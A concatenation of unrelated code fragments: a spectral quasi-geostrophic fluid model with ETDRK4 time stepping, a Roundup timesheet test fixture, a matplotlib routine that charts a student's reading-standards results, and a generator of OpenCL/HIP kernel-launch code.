"""
self.t=0 # time
self.tc=0 # time-step number
### initialization routines, only called once at the beginning ###
def _initialize_grid(self):
""" Create spatial and spectral grids and normalization constants.
"""
self.x,self.y = np.meshgrid(
np.arange(0.5,self.nx,1.)/self.nx*self.L,
np.arange(0.5,self.ny,1.)/self.ny*self.W )
self.dk = 2.*pi/self.L
self.dl = 2.*pi/self.L
# wavenumber grids
self.nl = self.ny
self.nk = self.nx//2+1
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# physical grid spacing
self.dx = self.L / self.nx
self.dy = self.W / self.ny
# constant for spectral normalizations
self.M = self.nx*self.ny
# isotropic wavenumber^2 grid
# the inversion is not defined at kappa = 0
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
self.wv4 = self.wv2**2
iwv2 = self.wv2 != 0.
self.wv2i = np.zeros_like(self.wv2)
self.wv2i[iwv2] = self.wv2[iwv2]**-1
def _initialize_background(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_inversion_matrix(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_forcing(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_filter(self):
"""Set up spectral filter or dealiasing."""
if self.use_filter:
cphi=0.65*pi
wvx=np.sqrt((self.k*self.dx)**2.+(self.l*self.dy)**2.)
self.filtr = np.exp(-23.6*(wvx-cphi)**4.)
self.filtr[wvx<=cphi] = 1.
self.logger.info(' Using filter')
elif self.dealias:
self.filtr = np.ones_like(self.wv2)
self.filtr[self.nx/3:2*self.nx/3,:] = 0.
self.filtr[:,self.ny/3:2*self.ny/3] = 0.
self.logger.info(' Dealiasing with 2/3 rule')
else:
self.filtr = np.ones_like(self.wv2)
self.logger.info(' No dealiasing; no filter')
def _do_external_forcing(self):
pass
def _initialize_logger(self):
""" Initialize logger.
"""
self.logger = logging.getLogger(__name__)
fhandler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)s: %(message)s')
fhandler.setFormatter(formatter)
if not self.logger.handlers:
self.logger.addHandler(fhandler)
self.logger.setLevel(10)
# this prevents the logger from propagating into the ipython notebook log
self.logger.propagate = False
self.logger.info(' Logger initialized')
def _step_etdrk4(self):
""" Take one step forward using an exponential time-dfferencing method
with a Runge-Kutta 4 scheme.
Rereferences
------------
See Cox and Matthews, J. Comp. Physics., 176(2):430-455, 2002.
Kassam and Trefethen, IAM J. Sci. Comput., 26(4):1214-233, 2005.
"""
self.qh0 = self.qh.copy()
Fn0 = -self.jacobian_psi_q()
self.qh = (self.expch_h*self.qh0 + Fn0*self.Qh)*self.filtr
self.qh1 = self.qh.copy()
if self.passive_scalar:
self.ch0 = self.ch.copy()
Fn0c = -self.jacobian_psi_c()
self.ch = (self.expch_hc*self.ch0 + Fn0c*self.Qhc)*self.filtr
self.ch1 = self.ch.copy()
self._calc_derived_fields()
c1 = self._calc_ep_c()
self._invert()
k1 = self._calc_ep_psi()
Fna = -self.jacobian_psi_q()
self.qh = (self.expch_h*self.qh0 + Fna*self.Qh)*self.filtr
if self.passive_scalar:
Fnac = -self.jacobian_psi_c()
self.ch = (self.expch_hc*self.ch0 + Fnac*self.Qhc)*self.filtr
self._calc_derived_fields()
c2 = self._calc_ep_c()
self._invert()
k2 = self._calc_ep_psi()
Fnb = -self.jacobian_psi_q()
self.qh = (self.expch_h*self.qh1 + ( 2.*Fnb - Fn0 )*self.Qh)*self.filtr
if self.passive_scalar:
Fnbc = -self.jacobian_psi_c()
self.ch = (self.expch_hc*self.ch1 + ( 2.*Fnbc - Fn0c )*self.Qhc)*self.filtr
self._calc_derived_fields()
c3 = self._calc_ep_c()
self._invert()
k3 = self._calc_ep_psi()
Fnc = -self.jacobian_psi_q()
self.qh = (self.expch*self.qh0 + Fn0*self.f0 + 2.*(Fna+Fnb)*self.fab\
+ Fnc*self.fc)*self.filtr
if self.passive_scalar:
Fncc = -self.jacobian_psi_c()
self.ch = (self.expchc*self.ch0 + Fn0c*self.f0c+ 2.*(Fnac+Fnbc)*self.fabc\
+ Fncc*self.fcc)*self.filtr
self._calc_derived_fields()
c4 = self._calc_ep_c()
self.cvar += self.dt*(c1 + 2*(c2+c3) + c4)/6.
# invert
self._invert()
# calcuate q
self.q = self.ifft(self.qh).real
if self.passive_scalar:
self.c = self.ifft(self.ch).real
k4 = self._calc_ep_psi()
self.Ke += self.dt*(k1 + 2*(k2+k3) + k4)/6.
def _initialize_etdrk4(self):
""" Compute coefficients of the exponential time-dfferencing method
with a Runge-Kutta 4 scheme.
Rereferences
------------
See Cox and Matthews, J. Comp. Physics., 176(2):430-455, 2002.
Kassam and Trefethen, IAM J. Sci. Comput., 26(4):1214-233, 2005.
"""
#
# coefficients for q-equation
#
# the exponent for the linear part
c = np.zeros((self.nl,self.nk),self.dtype_cplx)
c += -self.nu4*self.wv4 - self.nu*self.wv2 - self.mu - 1j*self.k*self.U
c += self.beta*self.ik*self.wv2i
ch = c*self.dt
self.expch = np.exp(ch)
self.expch_h = np.exp(ch/2.)
self.expch2 = np.exp(2.*ch)
M = 32. # number of points for line integral in the complex plane
rho = 1. # radius for complex integration
r = rho*np.exp(2j*np.pi*((np.arange(1.,M+1))/M)) # roots for integral
LR = ch[...,np.newaxis] + r[np.newaxis,np.newaxis,...]
LR2 = LR*LR
LR3 = LR2*LR
self.Qh = self.dt*(((np.exp(LR/2.)-1.)/LR).mean(axis=-1))
self.f0 = self.dt*( ( ( -4. - LR + ( np.exp(LR)*( 4. - 3.*LR + LR2 ) ) )/ LR3 ).mean(axis=-1) )
self.fab = self.dt*( ( ( 2. + LR + np.exp(LR)*( -2. + LR ) )/ LR3 ).mean(axis=-1) )
self.fc = self.dt*( ( ( -4. -3.*LR - LR2 + np.exp(LR)*(4.-LR) )/ LR3 ).mean(axis=-1) )
if self.passive_scalar:
#
# coefficients for c-equation
#
# the exponent for the linear part
c = np.zeros((self.nl,self.nk),self.dtype_cplx)
c += -self.nu4c*self.wv4 - self.nuc*self.wv2 - self.muc
ch = c*self.dt
self.expchc = np.exp(ch)
self.expch_hc = np.exp(ch/2.)
self.expch2c = np.exp(2.*ch)
r = rho*np.exp(2j*np.pi*((np.arange(1.,M+1))/M)) # roots for integral
LR = ch[...,np.newaxis] + r[np.newaxis,np.newaxis,...]
LR2 = LR*LR
LR3 = LR2*LR
self.Qhc = self.dt*(((np.exp(LR/2.)-1.)/LR).mean(axis=-1))
self.f0c = self.dt*( ( ( -4. - LR | |
<filename>test/user4_time.py
from roundup import date
def import_data_4 (db, user) :
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-18')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-19')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-20')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-21')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-22')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-23')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-24')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-13')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-14')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-15')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-16')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-17')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-18')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-19')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-02')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-03')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-04')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-05')
)
db.time_record.create \
( daily_record = dr
, duration = 8.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-06')
)
db.time_record.create \
( daily_record = dr
, duration = 7.25
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-07')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-08')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-09')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-10')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-11')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-12')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-13')
)
db.time_record.create \
( daily_record = dr
, duration = 6.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-14')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-15')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-16')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-17')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-18')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-19')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-20')
)
db.time_record.create \
( daily_record = dr
, duration = 8.25
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-21')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-22')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-23')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-24')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-25')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-26')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-27')
)
db.time_record.create \
( daily_record = dr
, duration = 8.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-28')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-29')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-30')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-31')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-01')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-02')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-03')
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-04')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-05')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-06')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-07')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-08')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date | |
import logging
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from django.conf import settings
from .map_table_tmplate import reading_2_5, indexes_dict
# from .models import MapStudentProfile, MapProfileExtResults, MapTestCheckItem
log = logging.getLogger("map_profile")
def draw_map_table(map_pro):
phone_number = map_pro.phone_number
plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号
# Prepare table
columns = ('Number', 'Domain', 'Items', 'GK', 'G1', 'G2', 'G3', 'G4', 'G5')
cell_text = [
["1", "Language Standards(K-5)", "Conventions of Standard English", "L.K.1", "L.1.1", "L.2.1", "L.3.1",
"L.4.1", "L.5.1"],
["", "", "", "L.K.1.A", "L.1.1.A", "L.2.1.A", "L.3.1.A", "L.4.1.A", "L.5.1.A"],
["", "", "", "L.K.1.B", "L.1.1.B", "L.2.1.B", "L.3.1.B", "L.4.1.B", "L.5.1.B"],
["", "", "", "L.K.1.C", "L.1.1.C", "L.2.1.C", "L.3.1.C", "L.4.1.C", "L.5.1.C"],
["", "", "", "L.K.1.D", "L.1.1.D", "L.2.1.D", "L.3.1.D", "L.4.1.D", "L.5.1.D"],
["", "", "", "L.K.1.E", "L.1.1.E", "L.2.1.E", "L.3.1.E", "L.4.1.E", "L.5.1.E"],
["", "", "", "L.K.1.F", "L.1.1.F", "L.2.1.F", "L.3.1.F", "L.4.1.F", ""],
["", "", "", "", "L.1.1.G", "", "L.3.1.G", "L.4.1.G", ""],
["", "", "", "", "L.1.1.H", "", "L.3.1.H", "", ""],
["", "", "", "", "L.1.1.I", "", "L.3.1.I", "", ""],
["", "", "", "", "L.1.1.J", "", "", "", ""],
["", "", "", "L.K.2", "L.1.2", "L.2.2", "L.3.2", "L.4.2", "L.5.2"],
["", "", "", "L.K.2.A", "L.1.2.A", "L.2.2.A", "L.3.2.A", "L.4.2.A", "L.5.2.A"],
["", "", "", "L.K.2.B", "L.1.2.B", "L.2.2.B", "L.3.2.B", "L.4.2.B", "L.5.2.B"],
["", "", "", "L.K.2.C", "L.1.2.C", "L.2.2.C", "L.3.2.C", "L.4.2.C", "L.5.2.C"],
["", "", "", "L.K.2.D", "L.1.2.D", "L.2.2.D", "L.3.2.D", "L.4.2.D", "L.5.2.D"],
["", "", "", "", "L.1.2.E", "L.2.2.E", "L.3.2.E", "", "L.5.2.E"],
["", "", "", "", "", "", "L.3.2.F", "", ""],
["", "", "", "", "", "", "L.3.2.G", "", ""],
["", "", "Knowledge of Language", "L.K.3", "L.K.3", "L.2.3", "L.3.3", "L.4.3", "L.5.3"],
["", "", "", "", "", "L.2.3.A", "L.3.3.A", "L.4.3.A", "L.5.3.A"],
["", "", "", "", "", "", "L.3.3.B", "L.4.3.B", "L.5.3.B"],
["", "", "", "", "", "", "", "L.4.3.C", ""],
["", "", "Vocabulary Acquisition and Use", "L.K.4", "L.1.4", "L.2.4", "L.3.4", "L.4.4", "L.5.4"],
["", "", "", "L.K.4.A", "L.1.4.A", "L.2.4.A", "L.3.4.A", "L.4.4.A", "L.5.4.A"],
["", "", "", "L.K.4.B", "L.1.4.B", "L.2.4.B", "L.3.4.B", "L.4.4.B", "L.5.4.B"],
["", "", "", "", "L.1.4.C", "L.2.4.C", "L.3.4.C", "L.4.4.C", "L.5.4.C"],
["", "", "", "", "", "L.2.4.D", "L.3.4.D", "", ""],
["", "", "", "", "", "L.2.4.E", "", "", ""],
["", "", "", "L.K.5", "L.1.5", "L.2.5", "L.3.5", "L.4.5", "L.5.5"],
["", "", "", "L.K.5.A", "L.1.5.A", "L.2.5.A", "L.3.5.A", "L.4.5.A", "L.5.5.A"],
["", "", "", "L.K.5.B", "L.1.5.B", "L.2.5.B", "L.3.5.B", "L.4.5.B", "L.5.5.B"],
["", "", "", "L.K.5.C", "L.1.5.C", "", "L.3.5.C", "L.4.5.C", "L.5.5.C"],
["", "", "", "L.K.5.D", "L.1.5.D", "", "", "", ""],
["", "", "", "L.K.6", "L.1.6", "L.2.6", "L.3.6", "L.4.6", "L.5.6"],
["2", "Speaking & Listening(K-5)", "Comprehension and Collaboration", "SL.K.1", "SL.1.1", "SL.2.1",
"SL.3.1", "SL.4.1", "SL.5.1.1"],
["", "", "", "SL.K.1.A", "SL.1.1.A", "SL.2.1.A", "SL.3.1.A", "SL.4.1.A", "SL.5.1.1.A"],
["", "", "", "SL.K.1.B", "SL.1.1.B", "SL.2.1.B", "SL.3.1.B", "SL.4.1.B", "SL.5.1.1.B"],
["", "", "", "", "SL.1.1.C", "SL.2.1.C", "SL.3.1.C", "SL.4.1.C", "SL.5.1.1..C"],
["", "", "", "", "", "", "SL.3.1.D", "SL.4.1.D", "SL.5.1.1.D"],
["", "", "", "SL.K.2", "SL.1.2", "SL.2.2", "SL.3.2", "SL.4.1.2", "SL.5.2"],
["", "", "", "SL.K.3", "SL.1.3", "SL.2.3", "SL.3.3", "SL.4.1.3", "SL.5.3"],
["", "", "Presentation of Knowledge and Ideas", "SL.K.4", "SL.1.4", "SL.2.4", "SL.3.4", "SL.4.1.4",
"SL.5.4"],
["", "", "", "SL.K.5", "SL.1.5", "SL.2.5", "SL.3.5", "SL.4.1.5", "SL.5.5"],
["", "", "", "SL.K.6", "SL.1.6", "SL.2.6", "SL.3.6", "SL.4.1.6", "SL.5.6"],
["3", "Writing", "Text Types and Purposes", "W.K.1", "W.1.1", "W.2.1", "W.3.1", "W.4.1", "W.5.1"],
["", "", "", "", "", "", "W.3.1.A", "W.4.1.A", "W.5.1.A"],
["", "", "", "", "", "", "W.3.1.B", "W.4.1.B", "W.5.1.B"],
["", "", "", "", "", "", "W.3.1.C", "W.4.1.C", "W.5.1.C"],
["", "", "", "", "", "", "W.3.1.D", "W.4.1.D", "W.5.1.D"],
["", "", "", "W.K.2", "W.1.2", "W.2.2", "W.3.2", "W.4.2", "W.5.2"],
["", "", "", "", "", "", "W.3.2.A", "W.4.2.A", "W.5.2.A"],
["", "", "", "", "", "", "W.3.2.B", "W.4.2.B", "W.5.2.B"],
["", "", "", "", "", "", "W.3.2.C", "W.4.2.C", "W.5.2.C"],
["", "", "", "", "", "", "W.3.2.D", "W.4.2.D", "W.5.2.D"],
["", "", "", "", "", "", "", "W.4.2.E", "W.5.2.E"],
["", "", "", "W.K.3", "W.1.3", "W.2.3", "W.3.3", "W.4.3", "W.5.3"],
["", "", "", "", "", "", "W.3.3.A", "W.4.3.A", "W.5.3.A"],
["", "", "", "", "", "", "W.3.3.B", "W.4.3.B", "W.5.3.B"],
["", "", "", "", "", "", "W.3.3.C", "W.4.3.C", "W.5.3.C"],
["", "", "", "", "", "", "W.3.3.D", "W.4.3.D", "W.5.3.D"],
["", "", "", "", "", "", "", "W.4.3.E", "W.5.3.E"],
["", "", "Production and Distribution of Writing", "W.K.4", "W.1.4", "W.2.4", "W.3.4", "W.4.4", "W.5.4"],
["", "", "", "W.K.5", "W.1.5", "W.2.5", "W.3.5", "W.4.5", "W.5.5"],
["", "", "", "W.K.6", "W.1.6", "W.2.6", "W.3.6", "W.4.6", "W.5.6"],
["", "", "Research to Build and Present Knowledge", "W.K.7", "W.1.7", "W.2.7", "W.3.7", "W.4.7",
"W.5.7"],
["", "", "", "W.K.8", "W.1.8", "W.2.8", "W.3.8", "W.4.8", "W.5.8"],
["", "", "", "W.K.9", "W.1.9", "W.2.9", "W.3.9", "W.4.9", "W.5.9"],
["", "", "", "", "", "", "", "W.4.9.A", "W.5.9.A"],
["", "", "", "", "", "", "", "W.4.9.B", "W.5.9.B"],
["", "", "Range of Writing", "W.K.10", "W.1.10", "W.2.10", "W.3.10", "W.4.10", "W.5.10"],
["4", "Reading: Foundational Skills(K-5)", "Print Concepts", "RF.K.1", "RF.1.1", "", "", "", ""],
["", "", "", "RF.K.1.A", "RF.1.1.A", "", "", "", ""],
["", "", "", "RF.K.1.B", "", "", "", "", ""],
["", "", "", "RF.K.1.C", "", "", "", "", ""],
["", "", "", "RF.K.1.D", "", "", "", "", ""],
["", "", "Phonological Awareness", "RF.K.2", "RF.1.2", "", "", "", ""],
["", "", "", "RF.K.2.A", "RF.1.2A", "", "", "", ""],
["", "", "", "RF.K.2.B", "RF.1.2B", "", "", "", ""],
["", "", "", "RF.K.2.C", "RF.1.2.C", "", "", "", ""],
["", "", "", "RF.K.2.D", "RF.1.2.D", "", "", "", ""],
["", "", "", "RF.K.2.E", "", "", "", "", ""],
["", "", "Phonics and Word Recognition", "RF.K.3", "RF.1.3", "RF.2.3", "RF.3.3", "RF.4.3", "RF.5.3"],
["", "", "", "RF.K.3.A", "RF.1.3.A", "RF.2.3.A", "RF.3.3.A", "RF.4.3.A", "RF.5.3.A"],
["", "", "", "RF.K.3.B", "RF.1.3.B", "RF.2.3.B", "RF.3.3.B", "", ""],
["", "", "", "RF.K.3.C", "RF.1.3.C", "RF.2.3.C", "RF.3.3.C", "", ""],
["", "", "", "RF.K.3.D", "RF.1.3.D", "RF.2.3.D", "RF.3.3.D", "", ""],
["", "", "", "", "RF.1.3.E", "RF.2.3.E", "", "", ""],
["", "", "", "", "RF.1.3.F", "RF.2.3.F", "", "", ""],
["", "", "", "", "RF.1.3.G", "", "", "", ""],
["", "", "Fluency", "RF.K.4", "RF.1.4", "RF.2.4", "RF.3.4", "RF.4.4", "RF.5.4"],
["", "", "", "", "RF.1.4.A", "RF.2.4.A", "RF.3.4.A", "RF.4.4.A", "RF.5.4.A"],
["", "", "", "", "RF.1.4.B", "RF.2.4.B", "RF.3.4.B", "RF.4.4.B", "RF.5.4.B"],
["", "", "", "", "RF.1.4.C", "RF.2.4.C", "RF.3.4.C", "RF.4.4.C", "RF.5.4.C"],
["5", "Reading Literature", "Key Ideas and Details", "RL.K.1", "RL.1.1", "RL.2.1", "RL.3.1",
"RL.4.1", "RL.5.1"],
["", "", "", "RL.K.2", "RL.1.2", "RL.2.2", "RL.3.2", "RL.4.2", "RL.5.2"],
["", "", "", "RL.K.3", "RL.1.3", "RL.2.3", "RL.3.3", "RL.4.3", "RL.5.3"],
["", "", "Craft and Structure", "RL.K.4", "RL.1.4", "RL.2.4", "RL.3.4", "RL.4.4", "RL.5.4"],
["", "", "", "RL.K.5", "RL.1.5", "RL.2.5", "RL.3.5", "RL.4.5", "RL.5.5"],
["", "", "", "RL.K.6", "RL.1.6", "RL.2.6", "RL.3.6", "RL.4.6", "RL.5.6"],
["", "", "Integration of Knowledge and Ideas", "RL.K.7", "RL.1.7", "RL.2.7", "RL.3.7", "RL.4.7", "RL.5.7"],
["", "", "", "RL.K.8", "RL.1.8", "RL.2.8", "RL.3.8", "RL.4.8", "RL.5.8"],
["", "", "", "RL.K.9", "RL.1.9", "RL.2.9", "RL.3.9", "RL.4.9", "RL.5.9"],
["", "", "Range of Reading and Level of Text Complexity", "RL.K.10", "RL.1.10", "RL.2.10", "RL.3.10",
"RL.4.10", "RL.5.10"],
["6", "Reading Standards for Informational Text(K-5)", "Key Ideas and Details", "RI.K.1", "RI.1.1",
"RI.2.1", "RI.3.1", "RI.4.1", "RI.5.1"],
["", "", "", "RI.K.2", "RI.1.2", "RI.2.2", "RI.3.2", "RI.4.2", "RI.5.2"],
["", "", "", "RI.K.3", "RI.1.3", "RI.2.3", "RI.3.3", "RI.4.3", "RI.5.3"],
["", "", "Craft and Structure", "RI.K.4", "RI.1.4", "RI.2.4", "RI.3.4", "RI.4.4", "RI.5.4"],
["", "", "", "RI.K.5", "RI.1.5", "RI.2.5", "RI.3.5", "RI.4.5", "RI.5.5"],
["", "", "", "RI.K.6", "RI.1.6", "RI.2.6", "RI.3.6", "RI.4.6", "RI.5.6"],
["", "", "Integration of Knowledge and Ideas", "RI.K.7", "RI.1.7", "RI.2.7", "RI.3.7", "RI.4.7", "RI.5.7"],
["", "", "", "RI.K.8", "RI.1.8", "RI.2.8", "RI.3.8", "RI.4.8", "RI.5.8"],
["", "", "", "RI.K.9", "RI.1.9", "RI.2.9", "RI.3.9", "RI.4.9", "RI.5.9"],
["", "", "Range of Reading and Level of Text Complexity", "RI.K.10", "RI.1.10", "RI.2.10", "RI.3.10",
"RI.4.10", "RI.5.10"]]
fig, ax = plt.subplots()
ax.axis('tight')
ax.axis('off')
the_table = ax.table(cellText=cell_text, cellColours=None,
colLabels=columns, loc='center', cellLoc='center')
fig.set_size_inches(14, 30)
# plt.figure(figsize=(1800, 1000))
the_table.auto_set_font_size(False)
the_table.set_fontsize(9)
the_table.auto_set_column_width(col=list(range(len(columns))))
the_table.scale(1, 0.24)
map_res = map_pro.map_ext_results.all()
log.info("Length of green cell is {}.".format(len(reading_2_5)))
for green_item_name in reading_2_5:
try:
indexes = indexes_dict[green_item_name]
except KeyError as err:
log.info("Item {} is not exist in map test table, error is: {}".format(green_item_name, err))
else:
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['green'])
for item_result in map_res:
item_name = item_result.check_item.item_name
item_level = item_result.item_level
try:
indexes = indexes_dict[item_name]
except KeyError as err:
log.info("Item {} is not exist in map test table, error is: {}".format(green_item_name, err))
else:
if item_level == "DEVELOP" or item_level == "REINFORCE_DEVELOP":
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['red'])
elif item_level == "REINFORCE":
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['yellow'])
else:
the_table[(indexes[0], indexes[1])].set_facecolor(mcolors.CSS4_COLORS['green'])
log.info("Item {}'s index is {}, with level {}".format(item_name, indexes, item_level))
file_path = str(settings.MEDIA_ROOT) + "/" + phone_number + '.pdf'
| |
"OCL":
if problemType["UseBeta"]:
s += "%scl_kernel kernelBetaOnly = betaZero ? kernel_%s : kernel_%s;\n" \
% (t, kernelNamesBetaOnly[0], kernelNamesBetaOnly[1])
else:
#s += "%sbool betaZero = true;\n" % (t)
s += "%scl_kernel kernelBetaOnly = kernel_%s;\n" \
% (t, kernelNamesBetaOnly[0])
argIdx = 0
s += "%sstatus = clSetKernelArg( kernelBetaOnly, %u, sizeof(cl_mem), &dataC ); tensileStatusCheck(status);\n" % (t, argIdx); argIdx+=1
# strides
for i in range(0,numStridesC):
s += "%sstatus = clSetKernelArg( kernelBetaOnly, %u, sizeof(unsigned int), &%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.strideList[i]); argIdx+=1
# sizes
for i in range(0, problemType["NumIndicesC"]):
s += "%sstatus = clSetKernelArg( kernelBetaOnly, %u, sizeof(unsigned int), &size%s ); tensileStatusCheck(status);\n" % (t, argIdx, self.indexChars[i]); argIdx+=1
# beta
if problemType["UseBeta"]:
s += "%sif (!betaZero) {\n" % (t)
s += "%s status = clSetKernelArg( kernelBetaOnly, %u, sizeof(%s), &beta ); tensileStatusCheck(status);\n" % (t, argIdx, typeName); argIdx+=1
s += "%s}\n" % (t)
# enqueue
s += "%scl_event kernelEventBetaOnly;\n" % (t)
s += "%sstatus = clEnqueueNDRangeKernel(\n" % (t)
t += " "
s += "%sstream,\n" % (t)
s += "%skernelBetaOnly,\n" % (t)
s += "%sworkDim,\n" % (t)
s += "%sNULL, // globalWorkOffset\n" % (t)
s += "%sglobalWorkSizeBetaOnly,\n" % (t)
s += "%slocalWorkSizeBetaOnly,\n" % (t)
s += "%snumInputEvents,\n" % (t)
s += "%sinputEvents,\n" % (t)
#s += "%soutputEvent );\n" % (t)
s += "%s&kernelEventBetaOnly );\n" % (t)
t = t[2:]
s += "%stensileStatusCheck(status);\n" % (t)
if problemType["UseBeta"]:
s += "%sbeta = %s;\n" % (t, problemType["DataType"].zeroString(self.language, 1) )
#s += "%sreturn tensileStatusSuccess;\n" % (t)
s += "%sstatus = clFinish(stream);\n" % (t)
s += "%stensileStatusCheck(status);\n" % (t)
#s += " float tmp[128*128];\n"
#s += "clEnqueueReadBuffer(stream, dataC, CL_TRUE, 0, 128*128*sizeof(float), tmp, 0, NULL, NULL);\n"
#s += "for (unsigned int i = 0; i < 128*128; i++) { printf(\"%f\\n\", tmp[i]); }\n"
else:
s += "%stry {\n" % (t)
t += " "
# TODO - timing with beta kernels is somewhat pessimistic since it has this separate event only on the GSU path.
# Introduces 2-3us of overhead ; may want to disable PreciseKernelTime so non-GSU have same overhead.
# Long-term fix would be to launch the beta kernel with the hipHccModule* API and set start-event in that call
s += "%sif( inputEvents != NULL )\n" % (t)
s += "%s hipEventRecord(inputEvents[0], stream );\n" % (t)
s += "%skernelsLaunched++;\n" % (t)
s += "%shipLaunchKernelGGL(\n" % (t)
t += " "
s += "%sHIP_KERNEL_NAME(%s),\n" % (t, kernelNamesBetaOnly[0])
